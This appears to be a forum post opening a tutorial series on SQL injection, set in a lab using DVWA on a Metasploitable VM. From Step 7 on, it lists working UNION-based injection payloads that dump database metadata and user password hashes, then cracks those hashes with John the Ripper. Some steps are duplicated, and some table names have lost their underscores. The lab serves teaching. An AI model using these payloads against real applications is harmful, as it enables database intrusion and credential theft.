Forum Thread: SQL Injection Lab PT.1 – Intro/Lab Setup

In this lab, We'll begin the series of SQL Injection. This will be Part-Wise Article/Guide on SQL Injection.

  • Let's start from LAB setup ( we will see these steps in detail in future posts) :

Kali Linux (or BT 5r3) VM and Metasploitable VM in NAT mode.
> Check IP address of both devices.

Step-by-step instruction

Step 1:

Open Kali Linux (or BT 5r3)

Step 2:

Open your browser and type http://IP address of
Metasploitable/dvwa/login.php

Step 3:

Login with user name "admin" and password "password"

Step 4:

Click on DVWA Security and set it to low then submit

Step 5:

Click on manual SQL injection

Step 6:

On User ID box type 1 and Submit

(Php select statement: $getid = "SELECT firstname, lastname FROM
users WHERE user_id = '$id'";)

Step 7:

%' or '0'='0
(mysql> SELECT firstname, lastname FROM users WHERE user_id = '%' or
'0'='0';)

Step 8:

Get DB version: %' or 0=0 union select null, version() #

Step 9:

Get DB user: %' or 0=0 union select null, user() #

Step 10:

Get DB user: %' or 0=0 union select null, user() #

Get DB name: %' or 0=0 union select null, database() #
Get Schima information: %' and 1=0 union select null, table_name from
information_schema.tables #

Step 11:

Get user table in Schema information: %' and 1=0 union select null,
tablename from informationschema.tables where table_name like 'user%'#

Get all the columns fields in the information_schema user table: %' and 1=0
union select null, concat(tablename,0x0a,columnname) from
informationschema.columns where tablename = 'users' #

Step 12:

Let's get password authentication hash: %' and 1=0 union select null,
concat(firstname,0x0a,lastname,0x0a,user,0x0a,password) from users #

Now copy all the hash file in a notepad as below format

E.g. user:password

Save it to /pentest/passwords/john by name dvwa_password.txt
Open a console and go to /pentest/passwords/john
cd /pentest/passwords/john
. now lunch john the ripper

./john –format=raw-MD5 dvwa_password.txt and hit enter.
(You will get the passwords)
….Ok Gurkhas, we'll continue this in next part.

Be the First to Respond

Share Your Thoughts

  • Hot
  • Active